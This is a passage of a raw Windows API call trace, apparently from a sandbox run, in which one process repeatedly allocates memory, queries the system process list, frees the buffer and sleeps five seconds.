RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.738] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.746] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.754] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.761] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.768] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.774] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.826] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.833] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.839] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.846] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.855] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.886] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.893] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.900] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.907] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.915] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) 